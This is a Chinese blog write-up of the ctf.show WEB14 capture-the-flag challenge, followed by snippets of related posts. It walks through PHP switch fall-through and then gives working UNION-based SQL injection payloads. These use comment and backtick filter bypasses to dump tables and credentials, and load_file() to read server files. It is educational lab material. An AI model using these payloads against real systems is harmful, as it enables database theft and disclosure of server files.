CTF show WEB14

最新推荐文章于 2025-01-31 10:56:38 发布
最新推荐文章于 2025-01-31 10:56:38 发布
阅读量2.9k 收藏 3
点赞数 5
分类专栏: CTF show WEB系列 文章标签: mysql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/miuzzx/article/details/104373112
版权
题目地址:https://ctf.show

对于这个题第一个坑要过的话必须得了解php的switch case语句。
在这里举个例子:


$number=1;
switch ($number)
{
    case "1":
        echo "one";
    case "2":
        echo "two";
    case "3"
        echo "three";
 }

输出结果为 one two three
如果在 echo “one”;后面加上break,输出结果为 one。这里应该就明白了吧。如果不加break会一直执行下去,直到结束或者遇到break。

在这个题目中有一条限制 sleep($c);就是我们输入的c是多少就会等待多少秒然后执行。所以我们想要输出$url就得找到一个小的case。我们可以看到下图中的c=3显然满足。case 3 后面没有break会接着执行下面的echo "$url"
在这里插入图片描述
输入?c=3成功显示 here_1s_your_f1ag.php,接下来访问该页面。是一个很明显的注入页面,但还不确定能否注入。在这里插入图片描述
我们先来看一下网站源代码有条提示
if(preg_match(’/information_schema.tables|information_schema.columns|linestring| |polygon/is’, $_GET[‘query’])){
die(’@A@’);
}
过滤的关键词有information_schema.tables,information_schema.columns,linestring,空格,polygon。在这里提供一种绕过的方法——反引号
反引号:它是为了区分MYSQL的保留字与普通字符而引入的符号。
例如information_schema.tables和information_schema.`tables`都可以使用。
网页的弹窗使得我们不容易观察,我们直接在源代码页面进行注入。
例如这样view-source:http://124.156.121.112:28051/here_1s_your_f1ag.php?query=1/**/order/**/by/**/1
当输入order by 1时才不显示错误,所以有一个回显位置。
接下来使用联合注入。
爆库名(web)

?query=-1/**/union/**/select/**/database()

爆表名(content)

?query=-1/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.`tables`/**/where/**/table_schema=database()

爆字段名(id,username,password)

?query=-1/**/union/**/select/**/group_concat(column_name)/**/from/**/information_schema.`columns`/**/where/**/table_name='content'

爆值

?query=-1/**/union/**/select/**/group_concat(id,username,password)/**/from/**/content

到这我们发现数据库中并没有我们想要的flag,但是有一条提示tell you a secret,secert has a secret… 所以很有可能flag在secret.php中,现在就有一个问题,我们怎么从数据库中查看文件内容呢,mysql提供了读取本地文件的函数load_file()
所以我们构造语句:

?query=-1/**/union/**/select/**/load_file('/var/www/html/secret.php')

得到如下内容

<?php
$url = 'here_1s_your_f1ag.php';
$file = '/tmp/gtf1y';
if(trim(@file_get_contents($file)) === 'ctf.show'){
	echo file_get_contents('/real_flag_is_here');
}')

也就是如果/tmp/gtf1y中的内容为ctf.show则输出/real_flag_is_here中的值,所以我们直接将/real_flag_is_here读取即可得到flag。

?query=-1/**/union/**/select/**/load_file('/real_flag_is_here')
CTF show web4
qq_43039823的博客
07-22 1059
这个题长得跟web3很相似,但是实际上内容不同,得到flag的姿势也是各不相同。 打开题目界面,依旧是老样子,上边光秃秃的就一句include ....结合上题目的知识很清晰的判断出是文件包含漏洞。“PHP:include(), include_once(), require(), require_once()等 老姿势 , url=/etc/passwd 依旧能读出用户的属性,文件包含确认! 尝试着跟上一个题目的思路一样,打开burp 加上一句<?php system("ls")?&g...
ctfshow-萌新-web14( 曲线救国-POST请求绕过获取网站敏感信息)_ctfweb14萌新
2401_84264244的博客
05-02 678
萌新模块 web14关, 此关卡是一个代码执行漏洞, 重点在于命令执行函数的利用方式, 源码中过滤比较严格, 尤其是过滤了分号;之后, 虽然可以用?>来代替分号, 但这样一来就只能执行一行代码, 难度较大, 需要注意的是, 源码中的过滤只针对GET请求的参数, 而未对POST请求的参数做限制, 这里推荐曲线救国, GET请求传递一句话木马, 然后在POST请求中传递参数执行系统命令, 从而获取 flag来到页面后展示了部分源码, 并提示 flag 就在 config.php文件中。
CTF.showweb14
qq_46230755的博客
01-16 430
打开来后执行语句得到提示 ?c=3 当c为3时,不会退出循环,进而执行下一个case语句得到url here_1s_your_f1ag.php 进入之后发现是一道注入题目 查看源代码发现存在提示 if(preg_match('/information_schema\.tables|information_schema\.columns|linestring| |polygon/is', $_GET['query'])){ die('@A@'); 老样子先爆库名 /here_1s_your_f1ag.
ctf.show-web14
2301_79210256的博客
10-10 297
进去以后发现是一个switch循环需要传参c,有四种结果,"@A@",$url,'@A@',"$url",这里我们直接传参3就可以了,因为在php中单引号包括的内容被当作纯字符的所以前两个没啥用,因为switch运行要遇到break才会停止,所以输入3以后会继续运行case6000000,然后显示出$url中的内容。打开后台发现将information_schema.tables和information_schema.columns禁了。随便试了几下发现不能运行怀疑将空格禁了,/**/绕过,爆库名。
CTFShow-Web篇详细wp(持续更新中ing)_ctfshow web wp
2501_90392025的博客
01-31 439
又是这个熟悉的框 老样子尝试万能密码 发现报错!
CTFshow web14
Je3Z的博客
04-18 826
<?php include("secret.php"); if(isset($_GET['c'])){ $c = intval($_GET['c']); sleep($c); switch ($c) { case 1: echo '$url'; break; case 2: echo '@A@'; break; case 555555
ctfshow web14
m0_55923820的博客
07-16 1376
ctfshow web 14 解析 这道题比较简单,分也只有5分,就是一个简单的sql注入。但是这个sql注入的回显你得看它的源代码里才有。但是它把你右击查看源码那个玩意儿给禁了。你需要在你的url前面加view-source:才能看到源码
ctfshow-WEB-web14( 利用数据库读写功能读取网站敏感文件)
wangyuxiang946的博客
09-07 1万+
ctf.show WEB模块第14关是一个SQL注入漏洞, 绕过switch循环后可以拿到一个登录界面, 登录界面存在SQL注入, 脱库以后会提示flag在另一个文件中, 利用数据库的文件读写功能读取文件内容即可拿到flag 开局是一个switch循环, 需要传递参数 c, 参数对应的执行结果有四种: '$url', '@A@', $url, "$url" ; 前两个是字符串, 没啥用, 作者的目的应该是想让我们输出后两个 $url 的其中一个, 但输出之前还有个sleep(), 选的不合适..
ctf.show_web2解题过程
qq_38634097的博客
05-24 678
打开场景看到的是登录框,输入弱口令admin/admin、admin/123456等无结果。我们已知,mysql5.0以上版本有infomation_schema,所以此处可以利用内置的数据库查询。得到flag:ctfshow{4db0befe-fc42-4b6f-8faf-f4b81f94fb82}构造poc:1’ or 1=1 # 进行登录,得到以下结果。1’ or 1=1 order by 4 # 登录失败。1’ or 1=1 order by 3 # 登录成功。得到第一列为flqg,
ctf_show笔记篇(web入门---文件上传)
whale_waves的博客
03-06 999
这里利用.user.ini文件,只要访问同目录下的php文件就能把目标png文件当作php文件加载。可以直接写payload获得flag,不用在继续$_POST之类的。自行搜索绕过一下其他的和153题无异。这里就关系到了网站中间件的设置问题。使用GIF89a在文件最上方添加。但是会验证图片头信息。
ctf_show笔记篇(web入门---信息收集)
whale_waves的博客
03-02 757
php探针是用php语言编写的一个程序,可以用来查看服务器的状态,比如服务器操作系统信息,服务器CPU、内存和硬盘的使用状况,php版本和组件信息,数据库版本信息,实时网速等。可以非常方便地了解服务器的运行状态雅黑php探针:url/tz.php可将这些写入目录扫描使用的字典里,可以跟方便的扫东西。
刷题之旅第34站,CTFshow web14
cc菜的一批
02-17 2384
感谢ctf show平台提供题目 提交命令,得到了php文件。 ?c=3 我们打开这个php文件看看,是个查询界面。 通过测试,我们发现 information_schema.columns,information_schema.tables均被过滤了,那么可能flag并不是在数据库中。 我们使用sql 的 load_file 命令,进行读文件。在前面我们看到了有个secret.php文件。...
ctfshow-web14
HAI_WD的博客
08-26 735
查看一下,发现完整的请求是http://c7ff9ed6-dccd-4d01-907a-f1c61c016c15.challenge.ctf.show/here_1s_your_f1ag.php?首先先测试注入,发现是数字型的,并且空格被处理了,所以直接绕过就行。并且这里看到这里处理的内容就是不让你去读表,类似于这种题目,要嘛就是让你从数据库里找,要嘛就是从文件里找。在index.php中包含了一个secret.php,先读这个文件试试,这里有一个小知识,apache的默认路径是。这道题就是,从文件里找。
ctfshow-萌新-web14( 曲线救国-POST请求绕过获取网站敏感信息)
热门推荐
wangyuxiang946的博客
09-12 1万+
ctf.show萌新模块 web14关, 此关卡是一个代码执行漏洞, 重点在于命令执行函数的利用方式, 源码中过滤比较严格, 尤其是过滤了分号;之后, 虽然可以用?>来代替分号, 但这样一来就只能执行一行代码, 难度较大, 需要注意的是, 源码中的过滤只针对GET请求的参数, 而未对POST请求的参数做限制, 这里推荐曲线救国,GET请求传递一句话木马, 然后在POST请求中传递参数执行系统命令, 从而获取 flag 来到页面后展示了部分源码, 并提示 flag 就在 config....
ctfshow web 14 sql注入
m0_46412682的博客
07-16 463
ctfshow web 14 sql注入 开始的页面是一段代码: 这是get传参,/?c=1 sleep一秒后输出$url /?c=2也会输出@A@,有5555 4444 333但是不可能等这么久,直接输 /?c=3,出现 @A@here_1s_your_f1ag.php@A@ 那打开这个文件,这是一个查询的页面 输入1回显是admin,url中可能存在sql注入 按F12查看源代码过滤了/information_schema.tables|information_schema.colum
ctfshow web入门 web14
weixin_59560134的博客
05-11 1067
根据题目提示查看源代码,发现编辑器路径 在url中输入/editor得到 点击文件上传发现文件空间可能有内容 /editor/attached/file/var/www/html/nothinghere/fl000g.txt 访问 /fl000g.txt拿到flag ctfshow{8be17f6c-7a13-419b-ada0-f5f1549b3ede} ...
ctf.show_web(1-14)wp
qq_73767109的博客
03-28 950
ctf.show_web(1-14) 详细解题思路及部分脚本
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1478
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
ctfshow web web签到--web14
2301_81040377的博客
06-06 920
要让回显有用的东西我们不可能回显几万,靶机都没了,所有挨着试。我想手注的,但是不知道为什么没有回显了只能sqlmap了。本来是想直接命令执行的,发现过滤了就用这个来看目录。SQL注入,我之前是没遇到这种格式的长了新姿势。php伪协议,不知道flag文件所以不能用。可以手注空格绕过,但是我的还是没有回显。显然我们不能用正常的SQL注入了。v1必须为字母v2必须为数字。查看源码原来我们的木马太长了。那么我们就需要用特殊的密码。刚好闭合,管理员身份就过了。我们并不知道密码,这里用。访问F12获得查询语句。
ctf show web入门163
最新发布
03-22
### 关于CTF Web安全入门的相关知识 #### 什么是CTF中的Web安全? CTF(Capture The Flag)是一种网络安全竞赛形式,其中Web安全是一个重要的组成部分。它主要涉及对Web应用程序的安全测试和技术挑战。通过解决这些题目,参赛者可以学习到多种攻击技术以及防御措施。 #### 常见的CTF Web安全题型 在CTF比赛中,Web安全题目通常涵盖了多个方面,包括但不限于SQL注入、跨站脚本攻击(XSS)、文件包含漏洞、命令执行等[^1]。每种类型的题目都有其特定的技术背景和解决方案。 #### XSS攻击及其变体 XSS(Cross-Site Scripting),即跨站脚本攻击,是CTF中非常常见的一类问题。这种攻击允许恶意用户将代码嵌入其他用户的浏览器页面上运行。根据实现方式的不同,XSS分为存储型、反射型和DOM-based三种类型[^2]。对于此类题目,选手需要掌握如何构造有效的payload并绕过可能存在的防护机制。 #### 编码技巧的重要性 除了直接面对逻辑错误外,编码也是解决问题过程中不可忽视的一部分。例如ASCII编码、URL编码、HTML实体编码等多种转换手段经常被用来隐藏或者修改数据表现形式从而达到欺骗服务器的目的[^3]。理解它们的工作原理有助于更好地分析潜在漏洞所在之处。 #### HTTP请求处理 另一个重要概念就是正确理解和操作HTTP协议下的GET与POST方法的区别及应用场合。简单来说, GET主要用于获取资源而不会改变状态; POST则用于提交表单或者其他需引起副作用的操作[^4]. 掌握这两者的差异可以帮助我们更精准地定位某些基于参数传递而导致的功能异常点. ```python import requests url = 'http://example.com/login' data = {'username': 'admin', 'password': 'password'} response = requests.post(url, data=data) print(response.text) ``` 上述示例展示了如何利用Python库`requests`发起一次简单的POST请求登录尝试。 ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值